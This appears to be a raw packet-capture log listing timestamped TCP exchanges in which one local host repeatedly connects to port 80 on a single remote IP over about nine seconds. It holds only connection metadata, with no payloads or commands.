Feb 7, 2023 20:02:17.345791101 CET	50025	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.346776962 CET	50026	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.407134056 CET	80	50025	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.407351971 CET	50025	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.407354116 CET	80	50026	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.407484055 CET	50026	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.408057928 CET	50026	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.468544960 CET	80	50026	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.471838951 CET	80	50026	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.473965883 CET	50026	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.595068932 CET	50026	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.595957994 CET	50027	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.655814886 CET	80	50026	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.656157970 CET	80	50027	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.656402111 CET	50026	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.656476021 CET	50027	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.657150984 CET	50027	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.717500925 CET	80	50027	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.719563007 CET	80	50027	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.722738981 CET	50027	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.830508947 CET	50027	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.831681013 CET	50028	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.890925884 CET	80	50027	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.891089916 CET	50027	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.893309116 CET	80	50028	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.894993067 CET	50028	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.895695925 CET	50028	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.957195044 CET	80	50028	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.959394932 CET	80	50028	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.959647894 CET	50028	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.063605070 CET	50028	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.064488888 CET	50029	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.125245094 CET	80	50028	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.125459909 CET	50028	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.126715899 CET	80	50029	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.126945019 CET	50029	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.139693022 CET	50029	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.202076912 CET	80	50029	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.205637932 CET	80	50029	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.205746889 CET	50029	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.318736076 CET	50029	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.319931030 CET	50030	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.381918907 CET	80	50029	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.382160902 CET	50029	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.383668900 CET	80	50030	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.383848906 CET	50030	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.384403944 CET	50030	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.446822882 CET	80	50030	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.449120998 CET	80	50030	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.449314117 CET	50030	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.574053049 CET	50030	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.574760914 CET	50031	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.636487007 CET	80	50030	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.636718035 CET	50030	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.636838913 CET	80	50031	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.637026072 CET	50031	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.637614012 CET	50031	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.699752092 CET	80	50031	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.702125072 CET	80	50031	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.702342987 CET	50031	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.816055059 CET	50031	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.816893101 CET	50032	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.878264904 CET	80	50031	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.878293991 CET	80	50032	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.878367901 CET	50031	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.878438950 CET	50032	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.890388012 CET	50032	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:18.951946020 CET	80	50032	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.954585075 CET	80	50032	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:18.954770088 CET	50032	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.064347029 CET	50032	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.065606117 CET	50033	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.125822067 CET	80	50032	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.125972033 CET	50032	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.126996040 CET	80	50033	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.127123117 CET	50033	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.127548933 CET	50033	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.189043999 CET	80	50033	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.192739964 CET	80	50033	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.192845106 CET	50033	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.299060106 CET	50033	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.300187111 CET	50034	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.360714912 CET	80	50033	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.360811949 CET	50033	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.361675024 CET	80	50034	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.361805916 CET	50034	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.362339020 CET	50034	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.423768997 CET	80	50034	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.426523924 CET	80	50034	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.426646948 CET	50034	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.548584938 CET	50034	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.549354076 CET	50035	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.609679937 CET	80	50035	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.609841108 CET	50035	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.610126972 CET	80	50034	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.610197067 CET	50034	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.615797997 CET	50035	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.676414967 CET	80	50035	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.678596020 CET	80	50035	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.678673029 CET	50035	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.783078909 CET	50035	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.783874989 CET	50036	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.843595028 CET	80	50035	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.843712091 CET	50035	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.845199108 CET	80	50036	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.845339060 CET	50036	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.847585917 CET	50036	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:19.908915043 CET	80	50036	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.911933899 CET	80	50036	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:19.912079096 CET	50036	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.022578001 CET	50036	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.023897886 CET	50037	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.084079981 CET	80	50036	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.084222078 CET	50036	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.084326029 CET	80	50037	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.084448099 CET	50037	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.092570066 CET	50037	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.153163910 CET	80	50037	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.157129049 CET	80	50037	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.157248020 CET	50037	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.274199009 CET	50037	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.275207043 CET	50038	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.334857941 CET	80	50037	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.334985018 CET	50037	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.335766077 CET	80	50038	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.335901022 CET	50038	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.336643934 CET	50038	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.397022963 CET	80	50038	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.399569988 CET	80	50038	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.399643898 CET	50038	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.520885944 CET	50038	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.521625996 CET	50039	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.581456900 CET	80	50038	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.581634998 CET	50038	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.581808090 CET	80	50039	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.581903934 CET	50039	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.584894896 CET	50039	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.645431042 CET	80	50039	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.648364067 CET	80	50039	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.648467064 CET	50039	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.756328106 CET	50039	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.757563114 CET	50040	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.816925049 CET	80	50039	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.817105055 CET	50039	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.817948103 CET	80	50040	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.818118095 CET	50040	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.818779945 CET	50040	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:20.879122019 CET	80	50040	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.881772995 CET	80	50040	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:20.881984949 CET	50040	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.002744913 CET	50040	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.003887892 CET	50041	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.063389063 CET	80	50040	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.065495014 CET	80	50041	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.065675020 CET	50040	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.065758944 CET	50041	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.067703009 CET	50041	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.129288912 CET	80	50041	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.132908106 CET	80	50041	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.133110046 CET	50041	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.236677885 CET	50041	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.237432957 CET	50042	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.297755003 CET	80	50042	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.297971964 CET	50042	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.298286915 CET	80	50041	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.298484087 CET	50042	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.298525095 CET	50041	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.358817101 CET	80	50042	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.361246109 CET	80	50042	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.366961002 CET	50042	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.471060038 CET	50042	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.474700928 CET	50043	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.531544924 CET	80	50042	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.532489061 CET	50042	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.535023928 CET	80	50043	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.535206079 CET	50043	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.535773993 CET	50043	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.596085072 CET	80	50043	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.598689079 CET	80	50043	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.599201918 CET	50043	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.705641031 CET	50043	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.706994057 CET	50044	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.766244888 CET	80	50043	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.766345024 CET	50043	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.767419100 CET	80	50044	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.771270037 CET	50044	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.772716045 CET	50044	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.833169937 CET	80	50044	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.835486889 CET	80	50044	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:21.835721016 CET	50044	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.961766958 CET	50044	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:21.962544918 CET	50045	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.022452116 CET	80	50044	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.022664070 CET	80	50045	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.022712946 CET	50044	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.022805929 CET	50045	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.023469925 CET	50045	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.083698988 CET	80	50045	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.087369919 CET	80	50045	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.087559938 CET	50045	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.206316948 CET	50045	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.208359003 CET	50046	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.266917944 CET	80	50045	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.267020941 CET	50045	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.270801067 CET	80	50046	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.271056890 CET	50046	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.274271011 CET	50046	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.336585999 CET	80	50046	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.339755058 CET	80	50046	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.339931965 CET	50046	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.455310106 CET	50046	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.456630945 CET	50047	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.517482042 CET	80	50047	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.517785072 CET	50047	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.518083096 CET	80	50046	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.518198013 CET	50046	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.518279076 CET	50047	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.578528881 CET	80	50047	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.581559896 CET	80	50047	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.581743956 CET	50047	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.690356016 CET	50047	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.691622972 CET	50048	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.750931978 CET	80	50047	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.751049995 CET	50047	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.752931118 CET	80	50048	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.753129959 CET	50048	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.753627062 CET	50048	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.814971924 CET	80	50048	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.817059040 CET	80	50048	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.817246914 CET	50048	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.929347992 CET	50048	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.941957951 CET	50049	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:22.990772009 CET	80	50048	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:22.990955114 CET	50048	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.002365112 CET	80	50049	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.002537966 CET	50049	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.003140926 CET	50049	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.063879013 CET	80	50049	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.067365885 CET	80	50049	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.067502975 CET	50049	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.175148964 CET	50049	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.178806067 CET	50050	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.235583067 CET	80	50049	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.235748053 CET	50049	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.240379095 CET	80	50050	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.240492105 CET	50050	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.248250008 CET	50050	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.309775114 CET	80	50050	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.312478065 CET	80	50050	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.312623024 CET	50050	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.429961920 CET	50050	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.431061029 CET	50051	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.491501093 CET	80	50050	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.491583109 CET	50050	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.493475914 CET	80	50051	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.493606091 CET	50051	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.494294882 CET	50051	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.558233023 CET	80	50051	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.559998035 CET	80	50051	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.560097933 CET	50051	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.674943924 CET	50051	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.675959110 CET	50052	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.736737013 CET	80	50052	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.736993074 CET	50052	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.737397909 CET	80	50051	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.737497091 CET	50051	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.740042925 CET	50052	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.800796032 CET	80	50052	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.802834988 CET	80	50052	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.802989006 CET	50052	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.935904980 CET	50052	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.936995983 CET	50053	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.996795893 CET	80	50052	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.997014046 CET	50052	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:23.998224974 CET	80	50053	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:23.998424053 CET	50053	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.008848906 CET	50053	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.070233107 CET	80	50053	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:24.073893070 CET	80	50053	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:24.075428963 CET	50053	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.189515114 CET	50053	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.190567017 CET	50054	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.251131058 CET	80	50053	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:24.251508951 CET	50053	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.251964092 CET	80	50054	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:24.252130032 CET	50054	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.270996094 CET	50054	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.333161116 CET	80	50054	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:24.336196899 CET	80	50054	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:24.336281061 CET	50054	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.439682007 CET	50054	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.440939903 CET	50055	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.501312017 CET	80	50054	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:24.503274918 CET	80	50055	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:24.503420115 CET	50054	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.503467083 CET	50055	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.503968954 CET	50055	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.566422939 CET	80	50055	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:24.568763018 CET	80	50055	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:24.568952084 CET	50055	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.690260887 CET	50055	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.691221952 CET	50056	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.752438068 CET	80	50056	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:24.752718925 CET	80	50055	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:24.752945900 CET	50056	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.752950907 CET	50055	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.870217085 CET	50056	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:24.931610107 CET	80	50056	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:24.933780909 CET	80	50056	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:24.934000969 CET	50056	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.238188982 CET	50056	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.239690065 CET	50057	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.299568892 CET	80	50056	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:25.299777031 CET	50056	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.301054001 CET	80	50057	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:25.301220894 CET	50057	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.359863043 CET	50057	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.423043966 CET	80	50057	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:25.425580025 CET	80	50057	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:25.425724983 CET	50057	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.565243006 CET	50057	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.566910982 CET	50058	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.627029896 CET	80	50057	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:25.627067089 CET	80	50058	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:25.627213955 CET	50057	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.627314091 CET	50058	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.697906017 CET	50058	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.758203030 CET	80	50058	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:25.760538101 CET	80	50058	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:25.760694981 CET	50058	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.898098946 CET	50058	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.899074078 CET	50059	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.958416939 CET	80	50058	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:25.958620071 CET	50058	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:25.959604979 CET	80	50059	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:25.959772110 CET	50059	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:26.009358883 CET	50059	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:26.070010900 CET	80	50059	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:26.073587894 CET	80	50059	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:26.074883938 CET	50059	80	192.168.2.6	62.204.41.4
